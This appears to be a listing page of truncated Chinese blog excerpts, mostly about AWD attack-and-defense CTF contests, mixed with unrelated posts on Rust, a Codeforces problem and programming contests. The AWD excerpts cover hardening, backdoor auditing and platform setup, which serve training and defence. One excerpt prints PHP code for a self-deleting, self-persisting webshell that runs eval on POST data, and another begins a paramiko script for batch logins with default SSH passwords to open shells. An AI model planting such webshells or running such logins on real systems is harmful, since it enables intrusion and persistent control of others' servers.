作者:Leafer   本文属于Arctic shell原创内容计划文章,转载请注明原文地址! 比赛环境:纯净win10,最新版kali,securecrt或者WinSCP 在进入服务器后应进行的常规操作: 1备份网站文件 2 修改数据库默认密码 3 修改网页登陆端一切弱密码 4 查看是否留有后门账户 5 关闭不必要端口,如远程登陆端口 6 使用命令匹配一句话特性 7 关注是否运行了“特殊”进程 8 权限高可以设置防火墙或者禁止他人修改本目录 1 备份网站 tar -zcvf web.tar.g…

搭建好了开发环境之后,就算是正式跳进Rust的坑了,今天我就要开始继续向下挖了. 由于我们初来乍到 ,对Rust还不熟悉,所以我决定先走一遍常规套路. 变不变的变量 学习一门语言第一个要了解的当然就是变量啦.Rust使用关键字let来定义变量.我们写一个简单的demo so easy!等等,这个小红线是怎么回事?编译错误???别着急,哪里不对点哪里. IDEA告诉我,这个错误是 Cannot assign twice to immutable variable [E0384] 不可变的变量不能赋…

今晚简单来看看那天比赛的源码吧,比赛的时候还是有些慌没有好好去静下心看代码. awd给的题中的漏洞,都是那种可以快速让你利用拿到权限后得到flag的那种,特别复杂利用的一般没有. 建议先黑盒去尝试,例如前台上传,后台上传,等等,执行失败再来结合代码审计看看是否可以绕过利用. 所以审计中重点关注预留后门,注入,文件上传,命令/代码执行. 0x01 预留后门 没有太多套路和隐藏 就是明显的马 比较有意思的是第一个大马. 当时以为就是普通的$pass  = 'ec38fe2a8497e0a8d6d34…

目录 题目构建 平台构建 后端部署流程 前端展示 批量启动 check 题目构建 赛题全部使用docker部署,需准备check脚本和镜像 镜像构建注意事项 1.注意web目录权限 2.注意服务是否自启动 3.修改ssh配置 4.创建flag文件并修改权限为600 这里基础镜像建议采用下面这两个,原因很简单,比较小,便于移植 ctfhub/base_web_nginx_mysql_php_56 ctfhub/base_web_nginx_mysql_php_73 docker pull ctfh…

今天只是简单写下心得和体会 平时工作很忙 留给学习的时间更加珍少宝贵. 重点说下第二天的攻防比赛吧  . 三波web题 .涉及jsp,php,py. 前期我们打的很猛.第一波jsp的题看到有首页预留后门,和css路径下一个非常隐蔽的马,我们利用这个马打了一大波flag,后面审计发现后台也是弱口令,存在上传. 而在后面,我们也利用几个马打了很大一波,名次很靠前,却没有好好防守,犯了一些致命错误,源码直接被人家删完,分数一点点拖后.到最后只有省3的名次. 不记录多的,一个是平时练习不够确实和人家前面…

线下AWD平台搭建以及一些相关问题解决 一.前言 文章首发于tools,因为发现了一些新问题但是没法改,所以在博客进行补充. 因为很多人可能没有机会参加线下的AWD比赛,导致缺乏这方面经验,比如我参加过五次线下AWD攻防,虽然看过许多网上的AWD打发套路,但终究都是纸上谈兵,所以前几次都是被吊锤,一来不熟悉环境,二来有点手忙脚乱,其实根本原因就是缺乏经验,因此最近翻了翻Github,终于找到一个不错的项目,下面便是搭建过程和一些注意事项. 二.平台搭建过程: 准备工作:需要准备一台Ubuntu虚…

最近工作很忙 今天抽空准备下AWD比赛得攻防工具和脚本 以下只是常用 希望下周不被吊锤~~ 后续整理后想抽空写成一个攻击框架汇总放github~~ 这里从各种情景和需求中去总结工具和脚本的使用   情景一 默认SSH密码批量反弹shell 官方在给出服务器密码时,很有可能是默认的,需要赶快修改自己的密码并尝试能不能登陆别人的靶机 #-*- coding:utf-8 -*- import paramiko ip = '192.168.1.137' port = ' username = 'root…

一个简单的不死马如: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>'; //pass=pass while (1){ file_put…

题目链接:http://codeforces.com/gym/101466/problem/K 题目: 题意: 给你一棵有n个节点的树,根节点始终为0,有两种操作: 1.RAND:查询以u为根节点的子树上的所有节点的权值的乘积x,及x的因数个数. 2.SEED:将节点u的权值乘以x. 思路: 比赛时少看了因数不大于13这句话,然后本题难度增加数倍,肝了两个小时都没肝出来,对不起队友啊,今天的组队训练赛实力背锅…… 这题一眼线段树,由于是对一棵子树进行处理,因此我们采用常规套路,借助dfs序将子树…

额 掰手指头一数 特么又是第三年十连测了= = 2017一场没打 那时候好像一场比赛也就100人左右 2018前几场还都好好补了 后来开始放飞自我了 这时候一场有150人还多了 2019想让今年的Noip不留遗憾 好像一场有200人多 现在好的能冲进前十不好也就三四十 主要是把题解里可以借鉴的思路和代码罗列一下 一. A.(ZROI954) 考虑对这玩意dp pi=1等价于右括号 pi=2等价于左括号 pi=3等价于左右任选括号 我们需要让其括号匹配的代价尽量小 然后排序顺序按照能力值大小,相等…